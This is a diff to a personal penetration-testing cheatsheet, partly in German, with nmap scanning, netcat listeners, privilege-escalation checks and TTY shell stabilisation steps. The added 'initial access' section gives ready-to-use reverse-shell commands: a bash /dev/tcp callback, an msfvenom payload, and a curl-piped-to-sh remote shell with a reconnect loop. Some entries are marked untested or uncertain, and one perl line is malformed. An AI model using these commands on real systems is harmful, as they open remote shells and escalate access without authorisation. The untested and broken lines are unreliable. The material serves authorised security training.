expanded Cheatsheet

Cheatsheet.md

@@ -26,70 +26,137 @@ to filter output for open ips
 ```bash
 nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
 ```
-scan open ports
+
+scan open ports:
 ```bash
 nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155 
 ```
+#### bei windows   
+```bash  
+nmap --vuln ip  
+```  
+##### bei windows \+ smb
+
+```bash  
+nmap --script vuln-smb* ip  
+nicht mehr sicher welches es war
+nmap --script smb-vuln* ip  
+```
+
+# inital access
+### start listener:
+```bash
+rlwrap -cAr nc -nlvp 9002
+```
+### reverse shell bash:
+```bash
+/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
+```
+### reverse shell file:
+```bash
+msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
+```
+-> from revshells.com
+
+### untested:
+ Reverse Shell as a Service
+
+ 1. On your machine:
+```bash
+      nc -l 1337
+	  or nlvp?
+```
+
+ 2. On the target machine:
+```bash
+      curl https://reverse-shell.sh/yourip:1337 | sh
+```
 
 
+#### reconnecting:
+```bash
+while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
+```
 
+# privilege escalation
 
-
+### always run these:
-
+```bash
-
+sudo -l
+```
+if sudo doesn't work: 
+[[#^78d3ce|spawn shell]]
+#### check cronjobs
+```bash
+ls /etc/cron.*
+crontab -l
+```
 
 ## TTY Spawn Shell
 
-Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
+##### if sudo still doesn't work
+use
+```bash
+sudo -S command
+```
 
+Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
 ### Python spawn shell
 
+```bash
 python -c 'import pty; pty.spawn("/bin/bash")'
-
+```
 Fully Interactive TTY
-
 #### All the steps to stabilize your shell
 
 **The first step:**
 
+```bash
 python3 -c 'import pty;pty.spawn("/bin/bash")'
+```
 
 Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys.
-
   
-
 **Step two is:**
 
+```bash
 export TERM=xterm
+```
 
 This will give us access to term commands such as clear.
 
-  
-
 **Finally (and most importantly) we will background the shell using**
 
+```bash
 Ctrl + Z
+```
 
 Back in our own terminal we use
 
+```bash
 stty raw -echo; fg
+```
 
 This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
 
+```bash
 stty rows 38 columns 116
-
+```
 ### OS system spawn shell
 
+```bash
 echo os.system("/bin/bash")
-
+```
 ### Bash spawn shell
 
+```bash
 /bin/sh -i
-
+```
 ### Perl spawn shell
 
+```bash
 perl —e 'exec "/bin/sh";'
-
+```
 ### Ruby spawn shell
 
 ruby: exec "/bin/sh"
@@ -104,12 +171,30 @@ exec "/bin/sh"
 
 ### VI spawn shell
 
+```bash
 :!bash
-
+```
 ### VI(2) spawn shell
 
+```bash
 :set shell=/bin/bash:shell
-
+```
 ### Nmap spawn shell
 
+```bash
 !sh
+```
+
+#### Exiftools
+
+Metadaten auslesen:
+
+```bash  
+exiftool picture.png  
+```
+
+Binwalk (Binary Daten exportieren):
+
+```bash  
+binwalk -e picture.png  
+```